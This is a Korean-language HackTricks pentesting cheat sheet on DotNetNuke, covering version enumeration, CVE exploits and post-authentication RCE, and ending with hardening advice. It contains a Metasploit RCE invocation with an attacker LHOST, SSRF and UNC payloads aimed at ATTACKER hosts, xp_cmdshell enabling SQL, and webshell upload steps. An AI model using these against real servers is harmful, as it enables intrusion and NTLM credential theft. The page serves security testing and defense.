DotNetNuke (DNN)

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

DotNetNuke (DNN)

DNN์— ๊ด€๋ฆฌ์ž๋กœ ๋กœ๊ทธ์ธํ•˜๋ฉด RCE๋ฅผ ์–ป๋Š” ๊ฒƒ์ด ์‰ฝ์ง€๋งŒ, ์ตœ๊ทผ ๋ช‡ ๋…„ ๋™์•ˆ ์—ฌ๋Ÿฌ ๋น„์ธ์ฆ ๋ฐ ์ธ์ฆ ํ›„ ๊ธฐ์ˆ ์ด ๋ฐœํ‘œ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ ์น˜ํŠธ ์‹œํŠธ๋Š” ๊ณต๊ฒฉ ๋ฐ ๋ฐฉ์–ด ์ž‘์—… ๋ชจ๋‘์— ์œ ์šฉํ•œ ๊ธฐ๋ณธ ์š”์†Œ๋ฅผ ์ˆ˜์ง‘ํ•ฉ๋‹ˆ๋‹ค.


๋ฒ„์ „ ๋ฐ ํ™˜๊ฒฝ ์—ด๊ฑฐ

  • X-DNN HTTP ์‘๋‹ต ํ—ค๋”๋ฅผ ํ™•์ธํ•˜์„ธ์š” โ€“ ์ผ๋ฐ˜์ ์œผ๋กœ ์ •ํ™•ํ•œ ํ”Œ๋žซํผ ๋ฒ„์ „์„ ๊ณต๊ฐœํ•ฉ๋‹ˆ๋‹ค.
  • ์„ค์น˜ ๋งˆ๋ฒ•์‚ฌ๋Š” /Install/Install.aspx?mode=install์—์„œ ๋ฒ„์ „์„ ์œ ์ถœํ•ฉ๋‹ˆ๋‹ค (๋งค์šฐ ์˜ค๋ž˜๋œ ์„ค์น˜์—์„œ ์ ‘๊ทผ ๊ฐ€๋Šฅ).
  • /API/PersonaBar/GetStatus (9.x)๋Š” ๋‚ฎ์€ ๊ถŒํ•œ ์‚ฌ์šฉ์ž์— ๋Œ€ํ•ด "dnnVersion"์„ ํฌํ•จํ•˜๋Š” JSON ๋ธ”๋กญ์„ ๋ฐ˜ํ™˜ํ•ฉ๋‹ˆ๋‹ค.
  • ๋ผ์ด๋ธŒ ์ธ์Šคํ„ด์Šค์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋Š” ์ผ๋ฐ˜์ ์ธ ์ฟ ํ‚ค:
  • .DOTNETNUKE โ€“ ASP.NET ํผ ์ธ์ฆ ํ‹ฐ์ผ“.
  • DNNPersonalization โ€“ XML/์ง๋ ฌํ™”๋œ ์‚ฌ์šฉ์ž ํ”„๋กœํ•„ ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค (๊ตฌ๋ฒ„์ „ โ€“ ์•„๋ž˜ RCE ์ฐธ์กฐ).

๋น„์ธ์ฆ ์ทจ์•ฝ์  ์ด์šฉ

1. ์ฟ ํ‚ค ์—ญ์ง๋ ฌํ™” RCE (CVE-2017-9822 ๋ฐ ํ›„์†)

์˜ํ–ฅ์„ ๋ฐ›๋Š” ๋ฒ„์ „ โ‰ค 9.3.0-RC

DNNPersonalization์€ ๋‚ด์žฅ๋œ 404 ํ•ธ๋“ค๋Ÿฌ๊ฐ€ ํ™œ์„ฑํ™”๋œ ๋ชจ๋“  ์š”์ฒญ์—์„œ ์—ญ์ง๋ ฌํ™”๋ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์กฐ์ž‘๋œ XML์€ ์ž„์˜์˜ ๊ฐ€์ ฏ ์ฒด์ธ ๋ฐ ์ฝ”๋“œ ์‹คํ–‰์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

๋ชจ๋“ˆ์€ ํŒจ์น˜๋˜์—ˆ์ง€๋งŒ ์—ฌ์ „ํžˆ ์ทจ์•ฝํ•œ ๋ฒ„์ „(CVE-2018-15811/15812/18325/18326)์— ๋Œ€ํ•ด ์˜ฌ๋ฐ”๋ฅธ ๊ฒฝ๋กœ๋ฅผ ์ž๋™์œผ๋กœ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค. 7.xโ€“9.1.x์—์„œ๋Š” ์ธ์ฆ ์—†์ด ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๋ฉฐ, 9.2.x+์—์„œ๋Š” ๊ฒ€์ฆ๋œ ์ €๊ถŒํ•œ ๊ณ„์ •์œผ๋กœ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

2. ์„œ๋ฒ„ ์ธก ์š”์ฒญ ์œ„์กฐ (CVE-2025-32372)

์˜ํ–ฅ์„ ๋ฐ›๋Š” ๋ฒ„์ „ < 9.13.8 โ€“ ํŒจ์น˜๊ฐ€ 2025๋…„ 4์›”์— ์ถœ์‹œ๋จ

๊ตฌ๋ฒ„์ „ DnnImageHandler ์ˆ˜์ •์˜ ์šฐํšŒ๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์„œ๋ฒ„์— ์ž„์˜์˜ GET ์š”์ฒญ์„ ํ•˜๋„๋ก ๊ฐ•์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(๋ฐ˜-๋ธ”๋ผ์ธ๋“œ SSRF). ์‹ค์ œ ์˜ํ–ฅ:

  • ํด๋ผ์šฐ๋“œ ๋ฐฐํฌ์—์„œ ๋‚ด๋ถ€ ํฌํŠธ ์Šค์บ” / ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์„œ๋น„์Šค ๊ฒ€์ƒ‰.
  • ์ธํ„ฐ๋„ท์—์„œ ๋ฐฉํ™”๋ฒฝ์œผ๋กœ ์ฐจ๋‹จ๋œ ํ˜ธ์ŠคํŠธ์— ์ ‘๊ทผ.

๊ฐœ๋… ์ฆ๋ช…(๋Œ€์ฒด TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

์š”์ฒญ์€ ๋ฐฑ๊ทธ๋ผ์šด๋“œ์—์„œ ํŠธ๋ฆฌ๊ฑฐ๋ฉ๋‹ˆ๋‹ค; ์ฝœ๋ฐฑ์„ ์œ„ํ•ด ๋ฆฌ์Šค๋„ˆ๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜์„ธ์š”.

3. NTLM ํ•ด์‹œ ๋…ธ์ถœ via UNC ๋ฆฌ๋””๋ ‰์…˜ (CVE-2025-52488)

์˜ํ–ฅ์„ ๋ฐ›๋Š” ๋ฒ„์ „ 6.0.0 โ€“ 9.x (< 10.0.1)

ํŠน๋ณ„ํžˆ ์กฐ์ž‘๋œ ์ฝ˜ํ…์ธ ๋Š” DNN์ด \\attacker\share\img.png์™€ ๊ฐ™์€ UNC ๊ฒฝ๋กœ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ฆฌ์†Œ์Šค๋ฅผ ๊ฐ€์ ธ์˜ค๋„๋ก ์‹œ๋„ํ•˜๊ฒŒ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Windows๋Š” NTLM ํ˜‘์ƒ์„ ๊ธฐ๊บผ์ด ์ˆ˜ํ–‰ํ•˜๋ฉฐ, ์„œ๋ฒ„ ๊ณ„์ • ํ•ด์‹œ๋ฅผ ๊ณต๊ฒฉ์ž์—๊ฒŒ ์œ ์ถœํ•ฉ๋‹ˆ๋‹ค. 10.0.1๋กœ ์—…๊ทธ๋ ˆ์ด๋“œํ•˜๊ฑฐ๋‚˜ ๋ฐฉํ™”๋ฒฝ์—์„œ ์•„์›ƒ๋ฐ”์šด๋“œ SMB๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•˜์„ธ์š”.

4. IP ํ•„ํ„ฐ ์šฐํšŒ (CVE-2025-52487)

๊ด€๋ฆฌ์ž๊ฐ€ ๊ด€๋ฆฌ ํฌํ„ธ ๋ณดํ˜ธ๋ฅผ ์œ„ํ•ด Host/IP ํ•„ํ„ฐ์— ์˜์กดํ•˜๋Š” ๊ฒฝ์šฐ, 10.0.1 ์ด์ „ ๋ฒ„์ „์€ ๋ฆฌ๋ฒ„์Šค ํ”„๋ก์‹œ ์‹œ๋‚˜๋ฆฌ์˜ค์—์„œ X-Forwarded-For๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ์šฐํšŒ๋  ์ˆ˜ ์žˆ์Œ์„ ์œ ์˜ํ•˜์„ธ์š”.


์ธ์ฆ ํ›„ RCE

SQL ์ฝ˜์†”์„ ํ†ตํ•œ

Settings โ†’ SQL ์•„๋ž˜์— ๋‚ด์žฅ๋œ ์ฟผ๋ฆฌ ์ฐฝ์ด ์‚ฌ์ดํŠธ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ๋Œ€ํ•œ ์‹คํ–‰์„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. Microsoft SQL Server์—์„œ **xp_cmdshell**์„ ํ™œ์„ฑํ™”ํ•˜๊ณ  ๋ช…๋ น์„ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

ASPX ์›น์‰˜ ์—…๋กœ๋“œ ๋ฐฉ๋ฒ•

  1. **Settings โ†’ Security โ†’ More โ†’ More Security Settings**๋กœ ์ด๋™ํ•ฉ๋‹ˆ๋‹ค.
  2. Allowable File Extensions์— aspx (๋˜๋Š” asp)๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ €์žฅํ•ฉ๋‹ˆ๋‹ค.
  3. **/admin/file-management**๋กœ ์ด๋™ํ•˜์—ฌ shell.aspx๋ฅผ ์—…๋กœ๋“œํ•ฉ๋‹ˆ๋‹ค.
  4. **/Portals/0/shell.aspx**์—์„œ ์ด๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•ฉ๋‹ˆ๋‹ค.

Windows์—์„œ์˜ ๊ถŒํ•œ ์ƒ์Šน

**IIS AppPool<Site>**๋กœ ์ฝ”๋“œ ์‹คํ–‰์ด ์ด๋ฃจ์–ด์ง€๋ฉด, ์ผ๋ฐ˜์ ์ธ Windows ๊ถŒํ•œ ์ƒ์Šน ๊ธฐ์ˆ ์ด ์ ์šฉ๋ฉ๋‹ˆ๋‹ค. ๋งŒ์•ฝ ์‹œ์Šคํ…œ์ด ์ทจ์•ฝํ•˜๋‹ค๋ฉด ๋‹ค์Œ์„ ํ™œ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • PrintSpoofer / SpoolFool๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SeImpersonatePrivilege๋ฅผ ์•…์šฉํ•ฉ๋‹ˆ๋‹ค.
  • Juicy/Sharp Potatoes๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Service Accounts์—์„œ ํƒˆ์ถœํ•ฉ๋‹ˆ๋‹ค.

๊ฐ•ํ™” ๊ถŒ์žฅ ์‚ฌํ•ญ (๋ธ”๋ฃจ ํŒ€)

  • 9.13.9 ์ด์ƒ์œผ๋กœ ์—…๊ทธ๋ ˆ์ด๋“œํ•ฉ๋‹ˆ๋‹ค (SSRF ์šฐํšŒ ์ˆ˜์ •) ๋˜๋Š” ๋ฐ”๋žŒ์งํ•˜๊ฒŒ๋Š” 10.0.1 (IP ํ•„ํ„ฐ ๋ฐ NTLM ๋ฌธ์ œ).
  • ์„ค์น˜ ํ›„ ์ž”์—ฌ InstallWizard.aspx* ํŒŒ์ผ์„ ์ œ๊ฑฐํ•ฉ๋‹ˆ๋‹ค.
  • ์•„์›ƒ๋ฐ”์šด๋“œ SMB (ํฌํŠธ 445/139) ์ดํƒˆ์„ ๋น„ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค.
  • DNN ๋‚ด์—์„œ๊ฐ€ ์•„๋‹ˆ๋ผ ์—ฃ์ง€ ํ”„๋ก์‹œ์—์„œ ๊ฐ•๋ ฅํ•œ Host Filters๋ฅผ ์‹œํ–‰ํ•ฉ๋‹ˆ๋‹ค.
  • ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ /API/RemoteContentProxy์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ์ฐจ๋‹จํ•ฉ๋‹ˆ๋‹ค.

์ฐธ์กฐ

  • Metasploit dnn_cookie_deserialization_rce ๋ชจ๋“ˆ ๋ฌธ์„œ โ€“ ์‹ค์šฉ์ ์ธ ์ธ์ฆ๋˜์ง€ ์•Š์€ RCE ์„ธ๋ถ€์ •๋ณด (GitHub).
  • GitHub ๋ณด์•ˆ ์ž๋ฌธ GHSA-3f7v-qx94-666m โ€“ 2025 SSRF ์šฐํšŒ ๋ฐ ํŒจ์น˜ ์ •๋ณด.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ